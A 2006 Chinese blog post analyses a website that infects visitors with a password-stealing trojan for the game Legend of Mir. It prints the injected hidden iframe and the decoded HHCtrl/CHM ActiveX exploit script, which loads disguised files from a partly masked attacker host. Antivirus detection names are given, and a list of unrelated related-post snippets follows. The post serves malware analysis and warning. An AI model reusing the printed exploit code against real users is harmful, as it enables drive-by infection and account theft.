[2006-04-12]一个下载传奇盗号木马的网站(第2版)
endurer 原创
2006-04-12 第2版 补充:kaspersky的回复
2006-04-11 第1版
网页:
hxxp://www.****44mtv.com/vod/index1.htm
中被加入
<iframe src="hxxp://www.****26cd.com/test/index.htm" height="0" width="0" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="no"></iframe>
hxxp://www.****26cd.com/test/index.htm部分代码使用了escape()编码,unescape()后的内容为:
<SCRIPT>var Words="<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.****26cd.com/test/bbs003302.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML>
";document.write(unescape(Words))</SCRIPT>
下载2个文件:
1、bbs003302.css
Kaspersky报为Trojan-PSW.Win32.Lmir.atj
2、bbs003302.gif
瑞星报为Exploit.HHCtrl.Jiaozhu
Kaspersky报为exploit.VBS.Phel.m
[2006-04-12]一个下载传奇盗号木马的网站(第2版)相关推荐
- 一个下载Dropper.Agent.fwm的网站
endurer 原创 2007-01-23 第1版 网站首页包含代码: /------- <iframe height="0" width="0" src ...
- linux ubuntu桌面下载,LXLE 16.04.3发布下载,基于Lubuntu桌面的Linux发行版
LXLE是一款使用轻量级桌面的Linux发行版,LXLE基于Lubuntu并以LXDE桌面环境为特色.LXLE 16.04.3已经发布下载,开发代号是"Eclectica",与其上 ...
- 我的世界1.12.2java下载_我的世界:Minecraft Java版 1.12.2-pre1发布
我的世界:Minecraft Java版 1.12.2-pre1发布!Minecraft 1.12.2仍未发布,1.12.2-pre1为其第1个预览版.预发布版是Minecraft的测试机制,如果该版 ...
- ChinaJoy揭晓十大网游盗号木马黑榜
7月12日,第5届ChinaJoy游戏展在上海拉开帷幕,为网游爱好者奉献了一场精彩的饕餮大餐.而在网络游戏已经成为一种时尚的今天,网游盗号问题也随之愈演愈烈,屡禁不止.很多游戏玩家也因此蒙受了严重的损 ...
- 再战Trojan.PSW.Lmir.kuo、Trojan.PSW.Misc.kcc等网游盗号木马(第2版)
endurer 原创 2006-08-13 第2版 补充一个漏网的 2006-08-12 第1版 今早一上网,就有网友求助.他电脑屏幕右下角的瑞星实时监控小伞图标不见了,手动启动也不行. 通过QQ远程 ...
- 迅雷漫画下载工具II 故障日志09.04.12
博客上很多的同学都来反映说是程序一打开就自动停止工作,经过分析发现程序出错很有可能发生在自动更新的过程中. 于是趁着返回学校前的十几分钟,决定抓虫试试. 根据网友们的反映,前几天尚未出现故障,说明软件 ...
- 木马下载器盗号数十种 破天木马剑指网游
"木马下载器20480"(Win32.TrojDownloader.wmTable.a.20480),这是一个下载者病毒.此病毒文件为muma.exe的可执行文件,但并不局限于该名 ...
- java能盗号吗_CVE-2017-8759漏洞新利用:Java Keylogger盗号木马分析
0×2 木马行为分析 1. 恶意word文档行为分析 该恶意word文件中除了一个"链接对象"外,没有其它任何内容.在未修复CVE-2017-8759漏洞的机器上双击打开此word ...
- 一款魔兽盗号木马分析
这款魔兽盗号木马是模仿"多玩魔兽盒子"欺骗用户从而进行盗号的,请看"多玩魔兽盒子"官方网站:http://wow.duowan.com/wowbox1/, 木马 ...
最新文章
- 【每日一算法】二叉树的最大深度
- Oracle 基础知识——客户端连接oracle数据库服务端的四种方法
- RabbitMQ配置环境变量后启动不了的解决方法
- java canonicalize_java.io.IOException:java.io.WinNTFileSystem.canonicalize0处的无效参数
- 高仿真的类-DefaultListableBeanFactory
- c++删除数组中重复元素_PG13中的功能—B树索引中的重复数据删除
- 基于mybatis-generator代码生成工具改(链式方法实体版)
- java虚拟机之垃圾回收器
- 网络医疗的进步让智能穿戴设备找到市场新蓝海
- Python3下的WIFI密码爆破
- mvcnn代码详解_使用colab运行tensorflow版本的faster-rcnn
- 浏览器网页 自动转格式化显示json数据
- 如把联想电脑计算机图标放在桌面上,联想的电脑应用怎么放到桌面图标-?(图)...
- JavaWeb学习-AJAX-3-练习:验证用户名是否存在
- 不受更新影响的微信PC客户端N开补丁
- TVS 管 和TSS管
- 创建Apple ID
- 【原创】大数据基础之Marathon(1)简介、安装、使用
- 轻松入门Python爬取基金数据
- 【期末复习】北京邮电大学《数字内容安全》课程期末复习笔记(5. 社交媒体安全)
热门文章
- python脚本怎么启动_怎么启动python脚本
- 华为 交换机VLAN的划分如何配置?
- 005-000-002丨山羊免疫球蛋白中英文说明书
- 最快引流的10个引流方法
- python中with open的用法_python中open和with open有什么区别?
- wps怎么快速插入符号?
- SQLServer:SQL语句中加中括号[ ]的含义
- 【openOcd学习】
- 企业管理的“斯隆铁律”
- linux中shutdown命令,linux下shutdown命令有什么作用 shutdown命令使用方法